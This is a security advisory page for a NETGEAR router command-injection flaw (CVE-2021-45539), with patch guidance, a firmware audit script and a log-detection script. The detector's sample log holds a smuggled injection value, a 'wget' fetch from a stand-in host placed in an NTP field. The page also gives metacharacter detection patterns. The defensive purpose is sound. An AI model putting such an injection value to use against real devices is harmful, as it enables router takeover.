CVE-2021-45539

8.4 HIGH

📋 TL;DR

This vulnerability allows authenticated attackers to execute arbitrary commands on affected NETGEAR routers and WiFi systems. It affects multiple NETGEAR device models running vulnerable firmware versions. Attackers must have valid credentials to exploit this command injection flaw.

💻 Affected Systems

Products:
  • NETGEAR R7900P
  • NETGEAR R7960P
  • NETGEAR R8000
  • NETGEAR R8000P
  • NETGEAR MR60
  • NETGEAR RAX20
  • NETGEAR RAX45
  • NETGEAR RAX80
  • NETGEAR MS60
  • NETGEAR RAX15
  • NETGEAR RAX50
  • NETGEAR RAX75
Versions: R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.74, R8000P before 1.4.2.84, MR60 before 1.0.6.110, RAX20 before 1.0.2.82, RAX45 before 1.0.2.28, RAX80 before 1.0.3.106, MS60 before 1.0.6.110, RAX15 before 1.0.2.82, RAX50 before 1.0.2.28, RAX75 before 1.0.3.106
Operating Systems: Embedded router firmware
Default Config Vulnerable: ⚠️ Yes
Notes: All affected devices with default configurations are vulnerable. Exploitation requires valid administrative credentials.

📦 What is this software?

NETGEAR consumer/prosumer wireless routers (R7900P, R7960P, R8000, R8000P and the RAX15/20/45/50/75/80 series) and NETGEAR mesh WiFi systems (MR60, MS60). Each runs NETGEAR's embedded firmware and is administered through a built-in web interface on the LAN, which can additionally be exposed to the internet when the Remote Management option is enabled.

⚠️ Risk & Real-World Impact

🔴 Worst Case: Complete device compromise. An attacker who can inject commands runs as the firmware's privileged user and can install a persistent backdoor, intercept or redirect traffic passing through the router, pivot into the internal network, or enrol the device in a botnet.

🟠 Likely Case: Local network compromise by an authenticated malicious user: credential theft, DNS hijacking, or silent manipulation of the device configuration.

🟢 If Mitigated: Limited impact if strong, unique administrator credentials are enforced and the management interface is reachable only from a trusted, segmented network.

🌐 Internet-Facing: MEDIUM - Exploitation requires valid credentials, but on devices where Remote Management has been enabled the administration interface is reachable from the internet, so a leaked, reused or brute-forced admin password is enough.
🏢 Internal Only: HIGH - Any host on the LAN can reach the administration interface; a user who holds or guesses the admin password can use this flaw to take full control of the router.

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires authenticated access to the web interface but is straightforward once credentials are obtained: the flaw is a post-authentication command injection, the class of NETGEAR bug for which public exploit code exists against related advisories, so adapting an existing exploit requires little effort.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: R7900P/R7960P/R8000P: 1.4.2.84+, R8000: 1.0.4.74+, MR60/MS60: 1.0.6.110+, RAX20/RAX15: 1.0.2.82+, RAX45/RAX50: 1.0.2.28+, RAX80/RAX75: 1.0.3.106+

Vendor Advisory: https://kb.netgear.com/000064476/Security-Advisory-for-Post-Authentication-Command-Injection-on-Some-Routers-and-WiFi-Systems-PSV-2020-0195

Restart Required: Yes

Instructions:

1. Log into the router web interface.
2. Navigate to Advanced > Administration > Firmware Update.
3. Check for updates.
4. If an update is available, download and install it.
5. The router reboots automatically; confirm the new version is listed after the reboot.

🔧 Temporary Workarounds

Disable remote management
  Applies to: all affected models
  Prevents external access to the router administration interface (the LAN-side interface remains reachable).
  Log into router > Advanced > Administration > Remote Management > Disable

Change default credentials
  Applies to: all affected models
  Use a strong, unique password for router administration so that the authentication barrier cannot be bypassed by guessing or credential reuse.
  Log into router > Advanced > Administration > Set Password > Create strong password

🧯 If You Can't Patch

  • Isolate router management interface to trusted VLAN only
  • Implement network segmentation to limit router access to authorized administrators

🔍 How to Verify

Check if Vulnerable:

Read the running firmware version in the web interface: Advanced > Administration > Firmware Update. Compare the numeric part of the version against the fixed version for your model in the Versions list above; anything lower is vulnerable.

Check Version:

Model-specific: the web interface is the authoritative source. Note that the interface may display the version with a leading "V" and a trailing build suffix (for example "V1.0.4.74_10.0.89"); only the dotted numeric part before the underscore is compared against the advisory.

Verify Fix Applied:

After the update and reboot, confirm the displayed firmware version matches or exceeds the patched version for your model as listed in the vendor advisory.
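The comparison above is easy to get wrong when done by hand, because firmware versions compare as dotted integers, not as strings ("1.0.2.9" is older than "1.0.2.28" even though it sorts later alphabetically). The following script is an added example, not code from NETGEAR or from this page; it encodes the fixed versions from the advisory table above, normalises the display format (leading "V", "_build" suffix, which are assumed to be cosmetic) and classifies a constructed inventory of model/version pairs.

```python
import re

# Minimum fixed firmware per model, copied from the advisory's Patch Version list.
FIXED_VERSIONS = {
    "R7900P": "1.4.2.84",
    "R7960P": "1.4.2.84",
    "R8000": "1.0.4.74",
    "R8000P": "1.4.2.84",
    "MR60": "1.0.6.110",
    "MS60": "1.0.6.110",
    "RAX15": "1.0.2.82",
    "RAX20": "1.0.2.82",
    "RAX45": "1.0.2.28",
    "RAX50": "1.0.2.28",
    "RAX75": "1.0.3.106",
    "RAX80": "1.0.3.106",
}

# Accepts "1.0.4.74", "V1.0.4.74" and "V1.0.4.74_10.0.89".
# Assumption: the "V" prefix and "_<build>" suffix shown by the web UI do not
# change which release is installed, so they are ignored for comparison.
_VERSION_RE = re.compile(r"^V?(\d+(?:\.\d+)+)(?:_.*)?$")


def parse_version(text):
    """Turn a firmware string into a tuple of ints so it compares numerically."""
    m = _VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised firmware version: {text!r}")
    return tuple(int(part) for part in m.group(1).split("."))


def is_vulnerable(model, version):
    """True if `model` runs firmware older than the fixed release.

    A model that is not in the advisory raises instead of returning False, so a
    typo in an inventory cannot silently turn a vulnerable device into a 'fixed' one.
    """
    key = model.strip().upper()
    if key not in FIXED_VERSIONS:
        raise KeyError(f"{model!r} is not in the advisory's affected-model list")
    return parse_version(version) < parse_version(FIXED_VERSIONS[key])


def audit(inventory):
    """Classify (model, firmware) pairs; returns {model: 'VULNERABLE' | 'FIXED'}."""
    return {
        model: ("VULNERABLE" if is_vulnerable(model, fw) else "FIXED")
        for model, fw in inventory
    }


# Constructed sample inventory for the example; these are not real devices.
SAMPLE_INVENTORY = [
    ("R8000", "V1.0.4.70_10.1.75"),   # below 1.0.4.74          -> VULNERABLE
    ("RAX80", "V1.0.3.106_10.0.85"),  # exactly the fixed build  -> FIXED
    ("MR60", "1.0.6.116"),            # newer than 1.0.6.110     -> FIXED
    ("RAX45", "1.0.2.9"),             # 9 < 28 numerically; a string compare would say FIXED
]

if __name__ == "__main__":
    for model, status in audit(SAMPLE_INVENTORY).items():
        print(f"{model:8s} {status}")
```

Feed `audit()` the model and version strings copied from each device's Firmware Update page; the last sample row is the case a naive string comparison gets wrong.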

📡 Detection & Monitoring

Log Indicators:

  • Administration-interface requests whose parameter values contain shell metacharacters (; | ` $( && >), which have no place in a configuration value
  • Multiple failed login attempts followed by successful login
  • Unexpected configuration changes

Network Indicators:

  • Unusual outbound connections from router
  • DNS changes not initiated by administrator
  • Unexpected port openings on router

SIEM Query (assumes requests to the administration interface have been collected and parsed so that the submitted value is available in a command field; consumer router syslog does not provide this on its own):

source="router_logs" AND (command="*;*" OR command="*|*" OR command="*`*" OR command="*$(*")
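Two of the indicators above, metacharacters in submitted configuration values and a burst of failed logins followed by a success, can be checked offline against whatever log you do have (a proxy or span-port capture in front of the management VLAN, for instance). The script below is an added example and is not NETGEAR's or this page's code; the log format, the event names and the parameter names (ssid, ntp_server, dns1) are assumptions for the sample, and the sample lines themselves are constructed, including the injected value in the sixth line.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qsl

# Same characters as the SIEM query, plus the &&, ||, newline and > forms that
# a shell would also honour. Any one of them in a config value is a finding.
_META_RE = re.compile(r"(;|\|\||&&|\||`|\$\(|\n|>)")

# Constructed sample log (assumed format, not a NETGEAR format):
#   <timestamp> <src_ip> <event> key=value ... ; params= carries the form body URL-encoded.
SAMPLE_LOG = """\
2021-12-01T09:58:01Z 192.168.1.50 login user=admin status=fail
2021-12-01T09:58:04Z 192.168.1.50 login user=admin status=fail
2021-12-01T09:58:07Z 192.168.1.50 login user=admin status=fail
2021-12-01T09:58:12Z 192.168.1.50 login user=admin status=ok
2021-12-01T09:58:40Z 192.168.1.50 config_update user=admin params=ssid=Home%20WiFi&ntp_server=pool.ntp.org
2021-12-01T09:59:02Z 192.168.1.50 config_update user=admin params=ntp_server=pool.ntp.org%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx%20-O%20%2Ftmp%2Fx
2021-12-01T10:05:00Z 192.168.1.20 login user=admin status=ok
2021-12-01T10:05:30Z 192.168.1.20 config_update user=admin params=ssid=Guest%20Net&dns1=9.9.9.9
"""


def parse_line(line):
    """Split one record into a dict; key=value tokens are split on the first '=' only."""
    ts, src, event, *kvs = line.split(" ")
    rec = {"ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src, "event": event}
    for kv in kvs:
        key, _, value = kv.partition("=")
        rec[key] = value
    return rec


def find_injection_attempts(records):
    """Flag every decoded form value that contains a shell metacharacter."""
    hits = []
    for rec in records:
        if "params" not in rec:
            continue
        for name, value in parse_qsl(rec["params"]):
            if _META_RE.search(value):
                hits.append({"ts": rec["ts"], "src": rec["src"], "user": rec.get("user"),
                             "param": name, "value": value})
    return hits


def find_bruteforce_then_success(records, min_failures=3, window=timedelta(minutes=5)):
    """Flag a successful login preceded by >= min_failures failures from the same
    source inside `window`. Failure history resets after each success."""
    failures = defaultdict(list)
    hits = []
    for rec in records:
        if rec["event"] != "login":
            continue
        if rec.get("status") == "fail":
            failures[rec["src"]].append(rec["ts"])
        elif rec.get("status") == "ok":
            recent = [t for t in failures[rec["src"]] if rec["ts"] - t <= window]
            if len(recent) >= min_failures:
                hits.append({"ts": rec["ts"], "src": rec["src"], "user": rec.get("user"),
                             "failures": len(recent)})
            failures[rec["src"]].clear()
    return hits


def analyze(log_text):
    """Run both detectors over a log; returns (injection_hits, bruteforce_hits)."""
    records = [parse_line(l) for l in log_text.splitlines() if l.strip()]
    return find_injection_attempts(records), find_bruteforce_then_success(records)


if __name__ == "__main__":
    injections, bruteforce = analyze(SAMPLE_LOG)
    for h in bruteforce:
        print(f"{h['ts']} {h['src']}: success after {h['failures']} failures (user={h['user']})")
    for h in injections:
        print(f"{h['ts']} {h['src']}: metacharacter in {h['param']}={h['value']!r}")
```

The two detectors are deliberately independent: a device that is already compromised will show injected values without any failed logins, and a credential-stuffing attacker who stops after logging in will show the burst without any injection, so either signal alone is worth an alert.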
